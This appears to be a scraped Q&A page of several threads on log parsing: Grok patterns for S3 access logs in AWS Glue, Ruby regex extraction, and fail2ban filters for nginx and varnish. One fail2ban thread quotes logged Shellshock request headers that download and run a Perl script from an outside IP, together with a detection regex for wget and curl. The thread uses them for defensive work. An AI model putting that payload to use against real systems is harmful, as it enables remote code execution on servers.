Glue Classifier Fails to classify s3 logs using Gork pattern

Glue Classifier Fails to classify s3 logs using Gork pattern - amazon-web-services

Problem : Running the Crawler with a classifier with right gork pattern doesn't create the table with columns instead table with 0 columns and recordCount 0 is created(but objectCount is 5)
Details : I set up a Glue Crawler to look at a s3 bucket which has s3-access-logs. This Glue Crawler uses a Classifier to classify columns for each entry in the log file.
The Classifier is setup with a Gork Pattern below
%{NOTSPACE:session_uuid} %{NOTSPACE:bucket_name} \[%{DATA:timestamp}\] %{IP:ip_address} %{NOTSPACE:principle} %{NOTSPACE:request_uuid} %{NOTSPACE:bucket_action} %{NOTSPACE:resource} \"%{DATA:resource_action}\" %{NOTSPACE:http_status} %{NOTSPACE:http_error_msg} %{NOTSPACE:unknown1} %{NOTSPACE:unknown2} %{NOTSPACE:unknown3} %{NOTSPACE:unknown4} %{NOTSPACE:url} %{NOTSPACE:client_info} %{GREEDYDATA:rest}
And above Gork pattern successfully matches S3 access logs like below when I tested it using online gork tester
efaeda52d1d3e3aaa719b9cddf4a4dd161157e2f9343635589d5b625ebcba84b my-s3bucket-12345 [12/Dec/2017:13:55:33 +0000] 123.123.123.123 - 2F834DCEE973FF7B REST.HEAD.BUCKET - "HEAD / HTTP/1.1" 400 AuthorizationHeaderMalformed 365 - 6 - "-" "AWSConfig" -
efaeda52d1d3e3aaa719b9cddf4a4dd161157e2f9343635589d5b625ebcba84b my-s3bucket-12345 [12/Dec/2017:14:32:29 +0000] 123.123.123.123 arn:aws:sts::1234567890:assumed-role/DataAccessRole 2F834DCEE973FF7B REST.GET.ACL - "GET /information-prefix/?acl HTTP/1.1" 200 - 622 - 237 - "-" "S3Console/0.4" -

The GROK pattern in this original question was helpful enough for me to get started with setting up my own crawler. However, it is definitely incomplete.
Using the documented Amazon S3 server access log format, I created this pattern which I believe is complete. Enjoy!
%{NOTSPACE:bucket_owner} %{NOTSPACE:bucket} \[%{DATA:time}\] %{NOTSPACE:remote_ip} %{NOTSPACE:requester} %{NOTSPACE:request_id} %{NOTSPACE:operation} %{NOTSPACE:key} \"%{DATA:resource_uri}\" %{NOTSPACE:http_status} %{NOTSPACE:error_code} %{NOTSPACE:bytes_sent} %{NOTSPACE:object_size} %{NOTSPACE:total_time} %{NOTSPACE:turn_around_time} \"%{NOTSPACE:referer}\" \"%{DATA:user_agent}\" %{NOTSPACE:version_id} %{NOTSPACE:host_id} %{NOTSPACE:signature_version} %{NOTSPACE:cipher_suite} %{NOTSPACE:authentication_type} %{NOTSPACE:host_header} %{NOTSPACE:tls_version} %{NOTSPACE:access_point_arn}
Note that many of these fields can be null and that Amazon puts - to represent those values. Also, note that some of the values are quoted.

Hope its not too late. I think the "IP" is causing problem for you, since it also create UNWANTED portion as well. Just use IPV4 instead of IP. Or you can use NOTSPACE as well.

Related

Extract a motif in various url strings with regex in ruby

I have different type of strings (in fact logs):
2022-08-03T16:20:41 - INFO - server.py - 649 - 192.168.1.24,192.168.1.29 - - [03/Aug/2022 16:20:41] "GET /get_customer_by_id/0024-A HTTP/1.0" 200 554 0.007798
2022-08-03T16:20:56 - INFO - utils.py - 10 - GET - http://192.168.1.24/get_customer_by_id/0025-A
2022-08-03T16:21:13 - INFO - utils.py - 10 - POST - http://192.168.1.24/order
I want to extract the customer id in each get_customer_by_id url. So for the previous example, i'm looking for 0024-A and 0025-A
I tried with a regex \/get_result\/(.+) but it gives me all the end of line when there is something after the customer id.
You can have a detail of implementation here: https://rubular.com/r/FgBxR1kUyQAYSl
How can i solve this ?
Thanks a lot for your help !

I suppose you'd be looking for something like /\/get_customer_by_id\/(\S+)/. This will grab all non-whitespace characters (stopping before the HTTP/1.0 on the first line). If you know it's always dddd-s, then you could also use something like /\/get_customer_by_id\/(\d+-\w)/. Either way, it will be in the first capture group (link to info on ruby capture groups).

Grok pattern assistance

Hi i'm in need of some serious help,
I have logs that i wish to Parse using GROK but the problem i'm having is that they are not always consistent in content or spacing here are some obfuscated examples.
title_access_log:ipaddress1, ipaddress2, ipaddress3 - - [14/Nov/2017:08:30:00 +0000] "GET /url HTTP/1.1" 200 198454 - 153261 - 0000fD5b5OSuS2C7ZdhgwqYufJk:GH809 url
title_access_log:ipaddress1, ipaddress2 - - [14/Nov/2017:08:30:00 +0000] "GET /url HTTP/1.1" 200 2326 - 20482 V22843489635e0e42e864037eccb8ad4857500ea 0000BDzHfUFhjJmcs9R4-CyglGS:GH806 url
title_access_log:ipaddress1, ipaddress2 - - [14/Nov/2017:08:30:00 +0000] "POST /url HTTP/1.1" 200 30031 - 17942 - 0000PjpQluI9BZ0w4EDB9o2fow-:GH809 url
I have managed to make a GROK patterns that pull out up to time and date for logs that contain 2 IPs but i get suck going further or when trying to do logs with 3 ips.
Has anyone got any advice on how to tackle this.
i'm using Graylog is what i'm using to extract data to so i do have the option of using other formats than GROK.

fail2ban scan for 403 in nginx access logs

I have setup some specific rules on nginx, blocking some urls and some extensions (aspx, sh, jsp, etc..).
I have also enable a custom access log file only for 403|429|410 errors, so that in only 1 place i can have all my access denied log.
My goal is to have fail2ban read this log and for every GET/POST that ends in a 403 error, IP should be banned.
1) nginx.conf will be logging the custom error log file like this:
log_format limit '$time_local - $remote_addr "$request" $status';
and this is a log entry:
03/Jan/2017:15:53:01 +0100 - 1.2.3.4 "GET /aaa.jsp HTTP/1.1" 403
2) i have a fail2ban filter like this (taken from here)
^<HOST> .* "(GET|POST) [^"]+" 403
3) i have tried with fail2ban-regex
fail2ban-regex /var/log/nginx/access-live-limitbot-website.log /etc/fail2ban/filter.d/nginx-403.conf
and this is the output
Results
=======
Failregex: 0 total
Ignoreregex: 0 total
Date template hits:
|- [# of hits] date format
| [1] Day/MONTH/Year:Hour:Minute:Second
`-
Lines: 2 lines, 0 ignored, 0 matched, 2 missed
|- Missed line(s):
| 217.19.158.242 "POST /wp-login.php HTTP/1.1" 403
| 03/Jan/2017:15:53:01 +0100 - 217.19.158.242 "GET /aaa.jsp HTTP/1.1" 403
`-
and i will never get the entry matching the error code.
Will someone please help me with the regex based on my custom log?
thank you

Fail2ban is picky about the date format. Also, for ease of matching, I suggest reordering the items in the log.
For date format, see documentation here:
https://www.fail2ban.org/wiki/index.php/MANUAL_0_8
In order for a log line to match your failregex, it actually has to match in two parts: the beginning of the line has to match a timestamp pattern or regex, and the remainder of the line has to match your failregex. If the failregex is anchored with a leading ^, then the anchor refers to the start of the remainder of the line, after the timestamp and intervening whitespace.
The pattern or regex to match the time stamp is currently not documented, and not available for users to read or set. See Debian bug #491253. This is a problem if your log has a timestamp format that fail2ban doesn't expect, since it will then fail to match any lines. Because of this, you should test any new failregex against a sample log line, as in the examples below, to be sure that it will match. If fail2ban doesn't recognize your log timestamp, then you have two options: either reconfigure your daemon to log with a timestamp in a more common format, such as in the example log line above; or file a bug report asking to have your timestamp format included.
For the reorder, something like datetime - status - host (- other stuff), would help create a simple pattern such as 403.
Therefore your log should look like:
03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP/1.1"
and your pattern can be
403 <HOST>
You can run this from the command line to validate as:
fail2ban-regex '03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP/1.1"' '403 <HOST>'
Which produces the output:
Running tests
=============
Use regex line : 403 <HOST>
Use single line: 03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP...
Matched time template Day-Month-Year Hour:Minute:Second
Got time using template Day-Month-Year Hour:Minute:Second
Results
=======
Failregex: 1 total
|- #) [# of hits] regular expression
| 1) [1] 403 <HOST>
`-
Ignoreregex: 0 total
Summary
=======
Addresses found:
[1]
1.2.3.4 (Tue Jan 03 15:53:01 2017)
Date template hits:
2 hit(s): Day-Month-Year Hour:Minute:Second
Success, the total number of match is 1

fail2ban varish equivalent to apache-noscript

Currently have a server with 2 IPs, one internal and one external with varnish on the external and an apache backend on the internal with fail2ban running pretty much as default.
Recently the website went down returning 503 errors and it turned out fail2ban had banned the varnish from talking to the apache backend vi the apache-noscript rule. I have since added an exclusion for the ip address so this will not get banned again, but ideally I would prefer it if the client was banned in future.
From the apache logs
SERVER_IP - - [14/Jan/2015:16:52:57 +0000] "GET /phppath/php HTTP/1.1" 404 438 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS! #";system(\"wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*\");'"
From the varnish logs
CLIENT_IP - - [14/Jan/2015:16:52:57 +0000] "GET http://SERVER_IP/phppath/php HTTP/1.1" 404 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*");'"
Would it be okay to just replicate my apache-noscript defnition to use the varnishlogs, i.e.:
[apache-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/apache*/*error.log
maxretry = 2
to become
[varnish-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/varnish/varnishncsa.log
maxretry = 2
I have noticed the apache no script filter has has the following failregex
failregex = ^%(_apache_error_client)s (File does not exist|script not found or unable to stat): /\S*(\.php|\.asp|\.exe|\.pl)\s*$
^%(_apache_error_client)s script '/\S*(\.php|\.asp|\.exe|\.pl)\S*' not found or unable to stat\s*$
I guess the main question is will this still work for the varnishlog in the output above, if not what failregex would I need?
Many Thanks.
[EDIT] It turns out as a coincidence the noscript did the banning but not for the above log entries. Now to formulate a fail2ban regex for the above log entry.

Okay I've created a new jail with the following rule to catch the above:
failregex = ^<HOST>.*\[[^]]+\].*\".+\"\s[1-9][0-9][0-9]\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$
Please feel free to suggest improvements to the rule to catch the log line mentioned above.
The fail regex works on both the apache access log and the varnish csa log.

grok - how do you find a quoted string

I am trying to grab the output from an nginx log file and send it to logstash.
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1” 200 3653189 “-” “git/1.8.3.4 (Apple Git–47)”
Grock is able to find the first 3 words fine
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000]
%{IPV4:user_ip} - %{USERNAME:user_name} \[%{HTTPDATE:time_local}\]
Grok is able to find the 3rd and 4th words fine
[14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1”
\[%{HTTPDATE:time_local}\] %{QUOTEDSTRING:request}
However when I combine them, and try to find all 4, grok says there are no results (using http://grokdebug.herokuapp.com/ for testing)
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1”
%{IPV4:user_ip} - %{USERNAME:user_name} \[%{HTTPDATE:time_local}\] %{QUOTEDSTRING:request}
#not found
Anyone know how to get the quoted string in the above example?
I'm brand new to grok, so perhaps I'm not approaching this correctly.
Update
Interestingly if I use the following log line and then manually type in the url it does work
bob 14/Feb/2014:18:57:05 +0000 "herp"
#Once herp works, replace herp, with POST
bob 14/Feb/2014:18:57:05 +0000 "POST"
#Once POST works, keep expounding until the whole thing is in place
autobuild 14/Feb/2014:18:57:05 +0000 "POST /main/builder.git/git-upload-pack HTTP/1.1"

"POST /main/builder.git/git-upload-pack HTTP/1.1" in pattern
"%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:httpversion}"

The process of posting to stack overflow identified the problem.
If you look carefully, the double quotes are parsed differently
"POST
vs
“POST
Manually typing in the double quote fixes the problem

Also you can use this expression for the cases where the log changes:
"%{WORD:verb}(?:| %{URIPATHPARAM:request})(?:| HTTP/%{NUMBER:httpversion})"
it matches with:
"POST /main/builder.git/git-upload-pack HTTP/1.1"
or
"POST /main/builder.git/git-upload-pack"
or
"POST"
try it.. ;)

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js

Glue Classifier Fails to classify s3 logs using Gork pattern - amazon-web-services

Hope its not too late. I think the "IP" is causing problem for you, since it also create UNWANTED portion as well. Just use IPV4 instead of IP. Or you can use NOTSPACE as well.

Related

Extract a motif in various url strings with regex in ruby

Grok pattern assistance

fail2ban scan for 403 in nginx access logs

fail2ban varish equivalent to apache-noscript

grok - how do you find a quoted string

Categories

Resources